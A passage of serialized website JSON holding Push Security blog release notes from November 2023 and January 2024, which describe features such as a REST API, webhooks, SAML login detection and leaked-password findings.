":173},{},[],{"data":252680,"marks":252681,"value":37,"nodeType":173},{},[],{"items":252683},[252684],{"sys":252685,"name":18399},{"id":18398},{"items":252687},[252688],{"fullName":19125,"firstName":19126,"jobTitle":19127,"profilePicture":252689},{"url":19129},{"__typename":1528,"sys":252691,"content":252693,"title":252949,"synopsis":252950,"hashTags":118,"publishedDate":252951,"slug":252952,"tagsCollection":252953,"authorsCollection":252957},{"id":252692},"58EOJUfsjNpdEYtKyQVYHM",{"json":252694},{"nodeType":165,"data":252695,"content":252696},{},[252697,252703,252746,252751,252758,252765,252779,252785,252802,252809,252824,252830,252847,252853,252874,252880,252900,252906,252913,252937,252943],{"nodeType":235,"data":252698,"content":252699},{},[252700],{"nodeType":173,"value":220348,"marks":252701,"data":252702},[],{},{"nodeType":250,"data":252704,"content":252705},{},[252706,252716,252726,252736],{"nodeType":254,"data":252707,"content":252708},{},[252709],{"nodeType":178,"data":252710,"content":252711},{},[252712],{"nodeType":173,"value":252713,"marks":252714,"data":252715},"Push REST API and webhooks available in beta",[],{},{"nodeType":254,"data":252717,"content":252718},{},[252719],{"nodeType":178,"data":252720,"content":252721},{},[252722],{"nodeType":173,"value":252723,"marks":252724,"data":252725},"View activity for all apps in your environment",[],{},{"nodeType":254,"data":252727,"content":252728},{},[252729],{"nodeType":178,"data":252730,"content":252731},{},[252732],{"nodeType":173,"value":252733,"marks":252734,"data":252735},"Easier cleanup of old or shared accounts",[],{},{"nodeType":254,"data":252737,"content":252738},{},[252739],{"nodeType":178,"data":252740,"content":252741},{},[252742],{"nodeType":173,"value":252743,"marks":252744,"data":252745},"SAML login detection",[],{},{"nodeType":312,"data":252747,"content":252750},{"target":252748},{"sys":252749},{"id":209109,"type":317,"linkType":318},[],{"nodeType":235,"data":252752,"content":252753},{},[252754],{"nodeType":173,"value":252755,"marks":252756,"data":252757},"Explore Push’s new REST API and webhooks",[],{},{"nodeType":178,"data":252759,"content":252760},{},[252761],{"nodeType":173,"value":252762,"marks":252763,"data":252764},"Now you can send Push data to a SIEM, or create real-time updates for events that occur on the platform, such as triggering a support ticket (or whatever else you’d like to do with Push data!), using our new REST API and webhooks, available in public beta.",[],{},{"nodeType":178,"data":252766,"content":252767},{},[252768,252772,252776],{"nodeType":173,"value":252769,"marks":252770,"data":252771},"You can configure the API and set up webhooks on the ",[],{},{"nodeType":173,"value":2789,"marks":252773,"data":252775},[252774],{"type":370},{},{"nodeType":173,"value":245443,"marks":252777,"data":252778},[],{},{"nodeType":312,"data":252780,"content":252784},{"target":252781},{"sys":252782},{"id":252783,"type":317,"linkType":318},"6aKaM2QlTFX6Tdap3Luwpi",[],{"nodeType":178,"data":252786,"content":252787},{},[252788,252791,252799],{"nodeType":173,"value":37,"marks":252789,"data":252790},[],{},{"nodeType":186,"data":252792,"content":252793},{"uri":183466},[252794],{"nodeType":173,"value":252795,"marks":252796,"data":252798},"Developer documentation",[252797],{"type":194},{},{"nodeType":173,"value":37,"marks":252800,"data":252801},[],{},{"nodeType":235,"data":252803,"content":252804},{},[252805],{"nodeType":173,"value":252806,"marks":252807,"data":252808},"See activity for all apps in your environment",[],{},{"nodeType":178,"data":252810,"content":252811},{},[252812,252816,252820],{"nodeType":173,"value":252813,"marks":252814,"data":252815},"See other apps that Push has discovered in your environment that it doesn’t recognize as commonly used work apps. You’ll find these “other apps” accessible from the ",[],{},{"nodeType":173,"value":71552,"marks":252817,"data":252819},[252818],{"type":370},{},{"nodeType":173,"value":252821,"marks":252822,"data":252823}," page in the admin console. Over time, we’ll be working to make it easy to request support for these apps, so you can monitor those you care about.",[],{},{"nodeType":312,"data":252825,"content":252829},{"target":252826},{"sys":252827},{"id":252828,"type":317,"linkType":318},"5tuTL1XuuDytbskxUewP2Q",[],{"nodeType":178,"data":252831,"content":252832},{},[252833,252836,252844],{"nodeType":173,"value":37,"marks":252834,"data":252835},[],{},{"nodeType":1698,"data":252837,"content":252840},{"target":252838},{"sys":252839},{"id":148863,"type":317,"linkType":318},[252841],{"nodeType":173,"value":148770,"marks":252842,"data":252843},[],{},{"nodeType":173,"value":37,"marks":252845,"data":252846},[],{},{"nodeType":235,"data":252848,"content":252849},{},[252850],{"nodeType":173,"value":252733,"marks":252851,"data":252852},[],{},{"nodeType":178,"data":252854,"content":252855},{},[252856,252860,252870],{"nodeType":173,"value":252857,"marks":252858,"data":252859},"If you need to do any cleanup of your inventory (or to help with employee offboarding), you can now select accounts in Push you wish to forget. ",[],{},{"nodeType":1698,"data":252861,"content":252865},{"target":252862},{"sys":252863},{"id":252864,"type":317,"linkType":318},"7lTCPjP5xRnvBlJI7aesWd",[252866],{"nodeType":173,"value":252867,"marks":252868,"data":252869},"Forgetting an account",[],{},{"nodeType":173,"value":252871,"marks":252872,"data":252873}," will remove that data from Push, but not impact the employee record itself. ",[],{},{"nodeType":312,"data":252875,"content":252879},{"target":252876},{"sys":252877},{"id":252878,"type":317,"linkType":318},"2Z9cdE7lttKORRVQDfDcOu",[],{"nodeType":178,"data":252881,"content":252882},{},[252883,252886,252896],{"nodeType":173,"value":148826,"marks":252884,"data":252885},[],{},{"nodeType":1698,"data":252887,"content":252891},{"target":252888},{"sys":252889},{"id":252890,"type":317,"linkType":318},"HbTn8sH2kV9CHHHeXpt9s",[252892],{"nodeType":173,"value":252893,"marks":252894,"data":252895},"resolve findings for shared accounts",[],{},{"nodeType":173,"value":252897,"marks":252898,"data":252899}," that have been remediated. If Push sees the account get shared again, a new finding will appear.",[],{},{"nodeType":312,"data":252901,"content":252905},{"target":252902},{"sys":252903},{"id":252904,"type":317,"linkType":318},"14bJ6ze4qC45uA9hHdVIme",[],{"nodeType":235,"data":252907,"content":252908},{},[252909],{"nodeType":173,"value":252910,"marks":252911,"data":252912},"See login methods, including SAML",[],{},{"nodeType":178,"data":252914,"content":252915},{},[252916,252920,252925,252929,252933],{"nodeType":173,"value":252917,"marks":252918,"data":252919},"The Push browser extension can now detect when logins occur via SAML, in addition to OIDC and password logins, giving you more context as you monitor how employees access work apps. You’ll see SAML appear in the Push admin console wherever ",[],{},{"nodeType":173,"value":252921,"marks":252922,"data":252924},"Login methods",[252923],{"type":370},{},{"nodeType":173,"value":252926,"marks":252927,"data":252928}," are shown, such as the ",[],{},{"nodeType":173,"value":71581,"marks":252930,"data":252932},[252931],{"type":370},{},{"nodeType":173,"value":252934,"marks":252935,"data":252936}," page and the account details slideout. ",[],{},{"nodeType":312,"data":252938,"content":252942},{"target":252939},{"sys":252940},{"id":252941,"type":317,"linkType":318},"59K4tBnQtiZkgppOulwKzD",[],{"nodeType":178,"data":252944,"content":252945},{},[252946],{"nodeType":173,"value":37,"marks":252947,"data":252948},[],{},"Product release: January 2024","Here’s what’s new on the Push platform for January 2024.","2024-01-09T00:00:00.000Z","product-release-january-2024",{"items":252954},[252955],{"sys":252956,"name":18399},{"id":18398},{"items":252958},[252959],{"fullName":19125,"firstName":19126,"jobTitle":19127,"profilePicture":252960},{"url":19129},{"items":252962},[252963],{"fullName":19125,"firstName":19126,"jobTitle":19127,"profilePicture":252964},{"url":19129},{"json":252966,"links":253124},{"data":252967,"content":252968,"nodeType":165},{},[252969,252975,253005,253011,253024,253029,253044,253050,253063,253068,253083,253089,253102,253107],{"data":252970,"content":252971,"nodeType":235},{},[252972],{"data":252973,"marks":252974,"value":220348,"nodeType":173},{},[],{"data":252976,"content":252977,"nodeType":250},{},[252978,252987,252996],{"data":252979,"content":252980,"nodeType":254},{},[252981],{"data":252982,"content":252983,"nodeType":178},{},[252984],{"data":252985,"marks":252986,"value":220361,"nodeType":173},{},[],{"data":252988,"content":252989,"nodeType":254},{},[252990],{"data":252991,"content":252992,"nodeType":178},{},[252993],{"data":252994,"marks":252995,"value":220371,"nodeType":173},{},[],{"data":252997,"content":252998,"nodeType":254},{},[252999],{"data":253000,"content":253001,"nodeType":178},{},[253002],{"data":253003,"marks":253004,"value":220381,"nodeType":173},{},[],{"data":253006,"content":253007,"nodeType":235},{},[253008],{"data":253009,"marks":253010,"value":220361,"nodeType":173},{},[],{"data":253012,"content":253013,"nodeType":178},{},[253014,253017,253021],{"data":253015,"marks":253016,"value":220394,"nodeType":173},{},[],{"data":253018,"marks":253019,"value":220399,"nodeType":173},{},[253020],{"type":370},{"data":253022,"marks":253023,"value":220403,"nodeType":173},{},[],{"data":253025,"content":253028,"nodeType":312},{"target":253026},{"sys":253027},{"id":220408,"type":317,"linkType":318},[],{"data":253030,"content":253031,"nodeType":178},{},[253032,253035,253041],{"data":253033,"marks":253034,"value":37,"nodeType":173},{},[],{"data":253036,"content":253037,"nodeType":186},{"uri":220418},[253038],{"data":253039,"marks":253040,"value":18605,"nodeType":173},{},[],{"data":253042,"marks":253043,"value":37,"nodeType":173},{},[],{"data":253045,"content":253046,"nodeType":235},{},[253047],{"data":253048,"marks":253049,"value":220432,"nodeType":173},{},[],{"data":253051,"content":253052,"nodeType":178},{},[253053,253056,253060],{"data":253054,"marks":253055,"value":65284,"nodeType":173},{},[],{"data":253057,"marks":253058,"value":220443,"nodeType":173},{},[253059],{"type":370},{"data":253061,"marks":253062,"value":220447,"nodeType":173},{},[],{"data":253064,"content":253067,"nodeType":312},{"target":253065},{"sys":253066},{"id":220452,"type":317,"linkType":318},[],{"data":253069,"content":253070,"nodeType":178},{},[253071,253074,253080],{"data":253072,"marks":253073,"value":37,"nodeType":173},{},[],{"data":253075,"content":253076,"nodeType":186},{"uri":220462},[253077],{"data":253078,"marks":253079,"value":220467,"nodeType":173},{},[],{"data":253081,"marks":253082,"value":37,"nodeType":173},{},[],{"data":253084,"content":253085,"nodeType":235},{},[253086],{"data":253087,"marks":253088,"value":220477,"nodeType":173},{},[],{"data":253090,"content":253091,"nodeType":178},{},[253092,253095,253099],{"data":253093,"marks":253094,"value":220484,"nodeType":173},{},[],{"data":253096,"marks":253097,"value":220489,"nodeType":173},{},[253098],{"type":370},{"data":253100,"marks":253101,"value":220493,"nodeType":173},{},[],{"data":253103,"content":253106,"nodeType":312},{"target":253104},{"sys":253105},{"id":220498,"type":317,"linkType":318},[],{"data":253108,"content":253109,"nodeType":178},{},[253110,253113,253121],{"data":253111,"marks":253112,"value":37,"nodeType":173},{},[],{"data":253114,"content":253117,"nodeType":1698},{"target":253115},{"sys":253116},{"id":2466,"type":317,"linkType":318},[253118],{"data":253119,"marks":253120,"value":18605,"nodeType":173},{},[],{"data":253122,"marks":253123,"value":37,"nodeType":173},{},[],{"entries":253125},{"inline":253126,"hyperlink":253127,"block":253130},[],[253128],{"sys":253129,"__typename":6655,"title":6691,"slug":6692,"articleId":6693},{"id":2466},[253131,253135,253142],{"sys":253132,"__typename":5345,"title":253133,"caption":118,"layoutMode":118,"file":253134},{"id":220408},"Dashboard - View SaaS apps - docs",{"url":84290,"width":84291,"height":84292},{"sys":253136,"__typename":5345,"title":253137,"caption":118,"layoutMode":118,"file":253138},{"id":220452},"Integration between Push and Okta - Add employees - docs",{"url":253139,"width":253140,"height":253141},"https://images.ctfassets.net/y1cdw1ablpvd/2CkcgMaggfxXiQluPB6ncL/34ceca4124b7ec94283c3211e61a4325/okta_integration_config_20240119.png",2314,1628,{"sys":253143,"__typename":5345,"title":247674,"caption":247675,"layoutMode":118,"file":253144},{"id":220498},{"url":247677,"width":247670,"height":247678},"content:blog:product-release-april-2024.json","blog/product-release-april-2024.json","blog/product-release-april-2024",{"_path":253149,"_dir":1500,"_draft":6,"_partial":6,"_locale":37,"sys":253150,"ogImage":118,"summary":253152,"title":248799,"subtitle":118,"metaTitle":253163,"synopsis":248800,"hashTags":118,"publishedDate":248801,"slug":248802,"tagsCollection":253164,"relatedBlogPostsCollection":253170,"authorsCollection":253866,"content":253870,"_id":254292,"_type":5439,"_source":5440,"_file":254293,"_stem":254294,"_extension":5439},"/blog/a-year-of-building-top-features-we-shipped-this-year",{"id":248363,"publishedAt":253151},"2024-03-28T19:15:02.644Z",{"json":253153},{"data":253154,"content":253155,"nodeType":165},{},[253156],{"data":253157,"content":253158,"nodeType":178},{},[253159],{"data":253160,"marks":253161,"value":253162,"nodeType":173},{},[],"It’s been a year since Push announced our Series A round. We wanted to take a minute to share some highlights of what we’ve built over the last year on our mission of stopping identity attacks and tell a bit of the behind-the-scenes story of why.","Top Push Security product features we shipped this year",{"items":253165},[253166,253168],{"sys":253167,"name":18399},{"id":18398},{"sys":253169,"name":117242},{"id":117241},{"items":253171},[253172,253400,253638],{"__typename":1528,"sys":253173,"content":253174,"title":245566,"synopsis":245567,"hashTags":118,"publishedDate":245568,"slug":245569,"tagsCollection":253392,"authorsCollection":253396},{"id":245323},{"json":253175},{"data":253176,"content":253177,"nodeType":165},{},[253178,253184,253223,253229,253235,253240,253257,253263,253283,253288,253305,253311,253317,253323,253338,253344,253357,253370,253375],{"data":253179,"content":253180,"nodeType":235},{},[253181],{"data":253182,"marks":253183,"value":220348,"nodeType":173},{},[],{"data":253185,"content":253186,"nodeType":250},{},[253187,253196,253205,253214],{"data":253188,"content":253189,"nodeType":254},{},[253190],{"data":253191,"content":253192,"nodeType":178},{},[253193],{"data":253194,"marks":253195,"value":245346,"nodeType":173},{},[],{"data":253197,"content":253198,"nodeType":254},{},[253199],{"data":253200,"content":253201,"nodeType":178},{},[253202],{"data":253203,"marks":253204,"value":245356,"nodeType":173},{},[],{"data":253206,"content":253207,"nodeType":254},{},[253208],{"data":253209,"content":253210,"nodeType":178},{},[253211],{"data":253212,"marks":253213,"value":245366,"nodeType":173},{},[],{"data":253215,"content":253216,"nodeType":254},{},[253217],{"data":253218,"content":253219,"nodeType":178},{},[253220],{"data":253221,"marks":253222,"value":245376,"nodeType":173},{},[],{"data":253224,"content":253225,"nodeType":235},{},[253226],{"data":253227,"marks":253228,"value":245346,"nodeType":173},{},[],{"data":253230,"content":253231,"nodeType":178},{},[253232],{"data":253233,"marks":253234,"value":245389,"nodeType":173},{},[],{"data":253236,"content":253239,"nodeType":312},{"target":253237},{"sys":253238},{"id":245394,"type":317,"linkType":318},[],{"data":253241,"content":253242,"nodeType":178},{},[253243,253246,253254],{"data":253244,"marks":253245,"value":37,"nodeType":173},{},[],{"data":253247,"content":253250,"nodeType":1698},{"target":253248},{"sys":253249},{"id":245406,"type":317,"linkType":318},[253251],{"data":253252,"marks":253253,"value":18605,"nodeType":173},{},[],{"data":253255,"marks":253256,"value":37,"nodeType":173},{},[],{"data":253258,"content":253259,"nodeType":235},{},[253260],{"data":253261,"marks":253262,"value":245356,"nodeType":173},{},[],{"data":253264,"content":253265,"nodeType":178},{},[253266,253269,253273,253276,253280],{"data":253267,"marks":253268,"value":245426,"nodeType":173},{},[],{"data":253270,"marks":253271,"value":245431,"nodeType":173},{},[253272],{"type":370},{"data":253274,"marks":253275,"value":245435,"nodeType":173},{},[],{"data":253277,"marks":253278,"value":2789,"nodeType":173},{},[253279],{"type":370},{"data":253281,"marks":253282,"value":245443,"nodeType":173},{},[],{"data":253284,"content":253287,"nodeType":312},{"target":253285},{"sys":253286},{"id":245448,"type":317,"linkType":318},[],{"data":253289,"content":253290,"nodeType":178},{},[253291,253294,253302],{"data":253292,"marks":253293,"value":37,"nodeType":173},{},[],{"data":253295,"content":253298,"nodeType":1698},{"target":253296},{"sys":253297},{"id":245460,"type":317,"linkType":318},[253299],{"data":253300,"marks":253301,"value":189115,"nodeType":173},{},[],{"data":253303,"marks":253304,"value":37,"nodeType":173},{},[],{"data":253306,"content":253307,"nodeType":235},{},[253308],{"data":253309,"marks":253310,"value":245474,"nodeType":173},{},[],{"data":253312,"content":253313,"nodeType":178},{},[253314],{"data":253315,"marks":253316,"value":245481,"nodeType":173},{},[],{"data":253318,"content":253319,"nodeType":178},{},[253320],{"data":253321,"marks":253322,"value":245488,"nodeType":173},{},[],{"data":253324,"content":253325,"nodeType":178},{},[253326,253329,253335],{"data":253327,"marks":253328,"value":37,"nodeType":173},{},[],{"data":253330,"content":253331,"nodeType":186},{"uri":71635},[253332],{"data":253333,"marks":253334,"value":18605,"nodeType":173},{},[],{"data":253336,"marks":253337,"value":37,"nodeType":173},{},[],{"data":253339,"content":253340,"nodeType":235},{},[253341],{"data":253342,"marks":253343,"value":245510,"nodeType":173},{},[],{"data":253345,"content":253346,"nodeType":178},{},[253347,253350,253354],{"data":253348,"marks":253349,"value":245517,"nodeType":173},{},[],{"data":253351,"marks":253352,"value":245522,"nodeType":173},{},[253353],{"type":370},{"data":253355,"marks":253356,"value":245526,"nodeType":173},{},[],{"data":253358,"content":253359,"nodeType":178},{},[253360,253363,253367],{"data":253361,"marks":253362,"value":245533,"nodeType":173},{},[],{"data":253364,"marks":253365,"value":245522,"nodeType":173},{},[253366],{"type":370},{"data":253368,"marks":253369,"value":245541,"nodeType":173},{},[],{"data":253371,"content":253374,"nodeType":312},{"target":253372},{"sys":253373},{"id":245546,"type":317,"linkType":318},[],{"data":253376,"content":253377,"nodeType":178},{},[253378,253381,253389],{"data":253379,"marks":253380,"value":37,"nodeType":173},{},[],{"data":253382,"content":253385,"nodeType":1698},{"target":253383},{"sys":253384},{"id":245558,"type":317,"linkType":318},[253386],{"data":253387,"marks":253388,"value":189115,"nodeType":173},{},[],{"data":253390,"marks":253391,"value":37,"nodeType":173},{},[],{"items":253393},[253394],{"sys":253395,"name":18399},{"id":18398},{"items":253397},[253398],{"fullName":19125,"firstName":19126,"jobTitle":19127,"profilePicture":253399},{"url":19129},{"__typename":1528,"sys":253401,"content":253402,"title":252949,"synopsis":252950,"hashTags":118,"publishedDate":252951,"slug":252952,"tagsCollection":253630,"authorsCollection":253634},{"id":252692},{"json":253403},{"nodeType":165,"data":253404,"content":253405},{},[253406,253412,253451,253456,253462,253468,253481,253486,253502,253508,253521,253526,253543,253549,253566,253571,253588,253593,253599,253619,253624],{"nodeType":235,"data":253407,"content":253408},{},[253409],{"nodeType":173,"value":220348,"marks":253410,"data":253411},[],{},{"nodeType":250,"data":253413,"content":253414},{},[253415,253424,253433,253442],{"nodeType":254,"data":253416,"content":253417},{},[253418],{"nodeType":178,"data":253419,"content":253420},{},[253421],{"nodeType":173,"value":252713,"marks":253422,"data":253423},[],{},{"nodeType":254,"data":253425,"content":253426},{},[253427],{"nodeType":178,"data":253428,"content":253429},{},[253430],{"nodeType":173,"value":252723,"marks":253431,"data":253432},[],{},{"nodeType":254,"data":253434,"content":253435},{},[253436],{"nodeType":178,"data":253437,"content":253438},{},[253439],{"nodeType":173,"value":252733,"marks":253440,"data":253441},[],{},{"nodeType":254,"data":253443,"content":253444},{},[253445],{"nodeType":178,"data":253446,"content":253447},{},[253448],{"nodeType":173,"value":252743,"marks":253449,"data":253450},[],{},{"nodeType":312,"data":253452,"content":253455},{"target":253453},{"sys":253454},{"id":209109,"type":317,"linkType":318},[],{"nodeType":235,"data":253457,"content":253458},{},[253459],{"nodeType":173,"value":252755,"marks":253460,"data":253461},[],{},{"nodeType":178,"data":253463,"content":253464},{},[253465],{"nodeType":173,"value":252762,"marks":253466,"data":253467},[],{},{"nodeType":178,"data":253469,"content":253470},{},[253471,253474,253478],{"nodeType":173,"value":252769,"marks":253472,"data":253473},[],{},{"nodeType":173,"value":2789,"marks":253475,"data":253477},[253476],{"type":370},{},{"nodeType":173,"value":245443,"marks":253479,"data":253480},[],{},{"nodeType":312,"data":253482,"content":253485},{"target":253483},{"sys":253484},{"id":252783,"type":317,"linkType":318},[],{"nodeType":178,"data":253487,"content":253488},{},[253489,253492,253499],{"nodeType":173,"value":37,"marks":253490,"data":253491},[],{},{"nodeType":186,"data":253493,"content":253494},{"uri":183466},[253495],{"nodeType":173,"value":252795,"marks":253496,"data":253498},[253497],{"type":194},{},{"nodeType":173,"value":37,"marks":253500,"data":253501},[],{},{"nodeType":235,"data":253503,"content":253504},{},[253505],{"nodeType":173,"value":252806,"marks":253506,"data":253507},[],{},{"nodeType":178,"data":253509,"content":253510},{},[253511,253514,253518],{"nodeType":173,"value":252813,"marks":253512,"data":253513},[],{},{"nodeType":173,"value":71552,"marks":253515,"data":253517},[253516],{"type":370},{},{"nodeType":173,"value":252821,"marks":253519,"data":253520},[],{},{"nodeType":312,"data":253522,"content":253525},{"target":253523},{"sys":253524},{"id":252828,"type":317,"linkType":318},[],{"nodeType":178,"data":253527,"content":253528},{},[253529,253532,253540],{"nodeType":173,"value":37,"marks":253530,"data":253531},[],{},{"nodeType":1698,"data":253533,"content":253536},{"target":253534},{"sys":253535},{"id":148863,"type":317,"linkType":318},[253537],{"nodeType":173,"value":148770,"marks":253538,"data":253539},[],{},{"nodeType":173,"value":37,"marks":253541,"data":253542},[],{},{"nodeType":235,"data":253544,"content":253545},{},[253546],{"nodeType":173,"value":252733,"marks":253547,"data":253548},[],{},{"nodeType":178,"data":253550,"content":253551},{},[253552,253555,253563],{"nodeType":173,"value":252857,"marks":253553,"data":253554},[],{},{"nodeType":1698,"data":253556,"content":253559},{"target":253557},{"sys":253558},{"id":252864,"type":317,"linkType":318},[253560],{"nodeType":173,"value":252867,"marks":253561,"data":253562},[],{},{"nodeType":173,"value":252871,"marks":253564,"data":253565},[],{},{"nodeType":312,"data":253567,"content":253570},{"target":253568},{"sys":253569},{"id":252878,"type":317,"linkType":318},[],{"nodeType":178,"data":253572,"content":253573},{},[253574,253577,253585],{"nodeType":173,"value":148826,"marks":253575,"data":253576},[],{},{"nodeType":1698,"data":253578,"content":253581},{"target":253579},{"sys":253580},{"id":252890,"type":317,"linkType":318},[253582],{"nodeType":173,"value":252893,"marks":253583,"data":253584},[],{},{"nodeType":173,"value":252897,"marks":253586,"data":253587},[],{},{"nodeType":312,"data":253589,"content":253592},{"target":253590},{"sys":253591},{"id":252904,"type":317,"linkType":318},[],{"nodeType":235,"data":253594,"content":253595},{},[253596],{"nodeType":173,"value":252910,"marks":253597,"data":253598},[],{},{"nodeType":178,"data":253600,"content":253601},{},[253602,253605,253609,253612,253616],{"nodeType":173,"value":252917,"marks":253603,"data":253604},[],{},{"nodeType":173,"value":252921,"marks":253606,"data":253608},[253607],{"type":370},{},{"nodeType":173,"value":252926,"marks":253610,"data":253611},[],{},{"nodeType":173,"value":71581,"marks":253613,"data":253615},[253614],{"type":370},{},{"nodeType":173,"value":252934,"marks":253617,"data":253618},[],{},{"nodeType":312,"data":253620,"content":253623},{"target":253621},{"sys":253622},{"id":252941,"type":317,"linkType":318},[],{"nodeType":178,"data":253625,"content":253626},{},[253627],{"nodeType":173,"value":37,"marks":253628,"data":253629},[],{},{"items":253631},[253632],{"sys":253633,"name":18399},{"id":18398},{"items":253635},[253636],{"fullName":19125,"firstName":19126,"jobTitle":19127,"profilePicture":253637},{"url":19129},{"__typename":1528,"sys":253639,"content":253641,"title":253854,"synopsis":253855,"hashTags":118,"publishedDate":253856,"slug":253857,"tagsCollection":253858,"authorsCollection":253862},{"id":253640},"419eJCECzN9ECKLsJD9vgs",{"json":253642},{"nodeType":165,"data":253643,"content":253644},{},[253645,253651,253684,253691,253707,253713,253730,253737,253753,253759,253777,253783,253797,253830,253837,253843,253848],{"nodeType":235,"data":253646,"content":253647},{},[253648],{"nodeType":173,"value":220348,"marks":253649,"data":253650},[],{},{"nodeType":250,"data":253652,"content":253653},{},[253654,253664,253674],{"nodeType":254,"data":253655,"content":253656},{},[253657],{"nodeType":178,"data":253658,"content":253659},{},[253660],{"nodeType":173,"value":253661,"marks":253662,"data":253663},"New finding type for leaked passwords",[],{},{"nodeType":254,"data":253665,"content":253666},{},[253667],{"nodeType":178,"data":253668,"content":253669},{},[253670],{"nodeType":173,"value":253671,"marks":253672,"data":253673},"Automatic licensing option for new employees",[],{},{"nodeType":254,"data":253675,"content":253676},{},[253677],{"nodeType":178,"data":253678,"content":253679},{},[253680],{"nodeType":173,"value":253681,"marks":253682,"data":253683},"Improved filtering options",[],{},{"nodeType":235,"data":253685,"content":253686},{},[253687],{"nodeType":173,"value":253688,"marks":253689,"data":253690},"Easily identify leaked passwords",[],{},{"nodeType":178,"data":253692,"content":253693},{},[253694,253698,253703],{"nodeType":173,"value":253695,"marks":253696,"data":253697},"We’ve added a filter to quickly identify any ",[],{},{"nodeType":173,"value":253699,"marks":253700,"data":253702},"leaked password findings",[253701],{"type":370},{},{"nodeType":173,"value":253704,"marks":253705,"data":253706}," among your employee accounts. You’ll also see leaked passwords listed as a separate security finding type on an account or employee record in the Push admin console, so it’s easier to distinguish those from other password vulnerabilities.",[],{},{"nodeType":312,"data":253708,"content":253712},{"target":253709},{"sys":253710},{"id":253711,"type":317,"linkType":318},"1bIPUfhQMnIIoyMDOebqqz",[],{"nodeType":178,"data":253714,"content":253715},{},[253716,253719,253727],{"nodeType":173,"value":37,"marks":253717,"data":253718},[],{},{"nodeType":1698,"data":253720,"content":253723},{"target":253721},{"sys":253722},{"id":248611,"type":317,"linkType":318},[253724],{"nodeType":173,"value":18605,"marks":253725,"data":253726},[],{},{"nodeType":173,"value":37,"marks":253728,"data":253729},[],{},{"nodeType":235,"data":253731,"content":253732},{},[253733],{"nodeType":173,"value":253734,"marks":253735,"data":253736},"Save time by automatically licensing new employees",[],{},{"nodeType":178,"data":253738,"content":253739},{},[253740,253744,253749],{"nodeType":173,"value":253741,"marks":253742,"data":253743},"Efficiently protect new employees with our new ",[],{},{"nodeType":173,"value":253745,"marks":253746,"data":253748},"automatic licensing",[253747],{"type":370},{},{"nodeType":173,"value":253750,"marks":253751,"data":253752}," feature. Once you’ve deployed the Push browser extension to employee browsers, Push will identify the user of a browser and then license them on the platform automatically.",[],{},{"nodeType":312,"data":253754,"content":253758},{"target":253755},{"sys":253756},{"id":253757,"type":317,"linkType":318},"6DWCHqJdupN7smSfrL5dW7",[],{"nodeType":178,"data":253760,"content":253761},{},[253762,253765,253774],{"nodeType":173,"value":37,"marks":253763,"data":253764},[],{},{"nodeType":1698,"data":253766,"content":253770},{"target":253767},{"sys":253768},{"id":253769,"type":317,"linkType":318},"6S9daVUJa84AWkPNDgXpBU",[253771],{"nodeType":173,"value":148770,"marks":253772,"data":253773},[],{},{"nodeType":173,"value":37,"marks":253775,"data":253776},[],{},{"nodeType":235,"data":253778,"content":253779},{},[253780],{"nodeType":173,"value":253681,"marks":253781,"data":253782},[],{},{"nodeType":178,"data":253784,"content":253785},{},[253786,253789,253793],{"nodeType":173,"value":156608,"marks":253787,"data":253788},[],{},{"nodeType":173,"value":71581,"marks":253790,"data":253792},[253791],{"type":370},{},{"nodeType":173,"value":253794,"marks":253795,"data":253796}," page, you can now filter by:",[],{},{"nodeType":250,"data":253798,"content":253799},{},[253800,253815],{"nodeType":254,"data":253801,"content":253802},{},[253803],{"nodeType":178,"data":253804,"content":253805},{},[253806,253811],{"nodeType":173,"value":253807,"marks":253808,"data":253810},"Identity provider and login method: ",[253809],{"type":370},{},{"nodeType":173,"value":253812,"marks":253813,"data":253814},"This makes it easier to identify accounts using specific IdPs and login methods (SAML, OIDC, or passwords), or any combination of those. We’ve also added timestamps for login methods, which you’ll see on the account details slideout.",[],{},{"nodeType":254,"data":253816,"content":253817},{},[253818],{"nodeType":178,"data":253819,"content":253820},{},[253821,253826],{"nodeType":173,"value":253822,"marks":253823,"data":253825},"App approval status or sensitivity: ",[253824],{"type":370},{},{"nodeType":173,"value":253827,"marks":253828,"data":253829},"This makes it easier to find accounts on high-value apps that have vulnerabilities, or see who’s still using unapproved apps. ",[],{},{"nodeType":178,"data":253831,"content":253832},{},[253833],{"nodeType":173,"value":253834,"marks":253835,"data":253836},"We’ve also made your selected filters easier to see by displaying them on the page when active.",[],{},{"nodeType":312,"data":253838,"content":253842},{"target":253839},{"sys":253840},{"id":253841,"type":317,"linkType":318},"6qydMrw4uidUGqi63tVlYU",[],{"nodeType":312,"data":253844,"content":253847},{"target":253845},{"sys":253846},{"id":209109,"type":317,"linkType":318},[],{"nodeType":178,"data":253849,"content":253850},{},[253851],{"nodeType":173,"value":37,"marks":253852,"data":253853},[],{},"Product release: November 2023","Here’s what’s new on the Push platform for November 2023.","2023-11-28T00:00:00.000Z","product-release-november-2023",{"items":253859},[253860],{"sys":253861,"name":18399},{"id":18398},{"items":253863},[253864],{"fullName":19125,"firstName":19126,"jobTitle":19127,"profilePicture":253865},{"url":19129},{"items":253867},[253868],{"fullName":19125,"firstName":19126,"jobTitle":19127,"profilePicture":253869},{"url":19129},{"json":253871,"links":254246},{"nodeType":165,"data":253872,"content":253873},{},[253874,253880,253886,253892,253916,253922,253927,253942,253959,253985,253990,253996,254002,254008,254014,254020,254025,254031,254037,254054,254060,254148,254154,254160,254166,254187,254204,254223,254240],{"nodeType":178,"data":253875,"content":253876},{},[253877],{"nodeType":173,"value":248372,"marks":253878,"data":253879},[],{},{"nodeType":235,"data":253881,"content":253882},{},[253883],{"nodeType":173,"value":248379,"marks":253884,"data":253885},[],{},{"nodeType":178,"data":253887,"content":253888},{},[253889],{"nodeType":173,"value":248386,"marks":253890,"data":253891},[],{},{"nodeType":178,"data":253893,"content":253894},{},[253895,253898,253904,253907,253913],{"nodeType":173,"value":37,"marks":253896,"data":253897},[],{},{"nodeType":186,"data":253899,"content":253900},{"uri":182804},[253901],{"nodeType":173,"value":197416,"marks":253902,"data":253903},[],{},{"nodeType":173,"value":248402,"marks":253905,"data":253906},[],{},{"nodeType":186,"data":253908,"content":253909},{"uri":248407},[253910],{"nodeType":173,"value":248410,"marks":253911,"data":253912},[],{},{"nodeType":173,"value":248414,"marks":253914,"data":253915},[],{},{"nodeType":178,"data":253917,"content":253918},{},[253919],{"nodeType":173,"value":248421,"marks":253920,"data":253921},[],{},{"nodeType":312,"data":253923,"content":253926},{"target":253924},{"sys":253925},{"id":248428,"type":317,"linkType":318},[],{"nodeType":178,"data":253928,"content":253929},{},[253930,253933,253939],{"nodeType":173,"value":37,"marks":253931,"data":253932},[],{},{"nodeType":186,"data":253934,"content":253935},{"u